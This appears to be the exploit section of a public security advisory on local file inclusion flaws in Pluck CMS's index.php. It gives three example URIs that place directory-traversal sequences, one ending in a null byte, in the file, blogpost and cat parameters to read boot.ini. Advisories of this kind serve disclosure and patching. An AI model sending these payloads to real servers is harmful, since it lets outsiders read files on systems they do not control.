• info
• discussion
• exploit
• solution
• references

Pluck 'index.php' Multiple Local File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[installdir]/index.php?file=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
http://www.example.com/[installdir]/index.php?blogpost=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
http://www.example.com/[installdir]/index.php?blogpost=DSecRG&cat=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00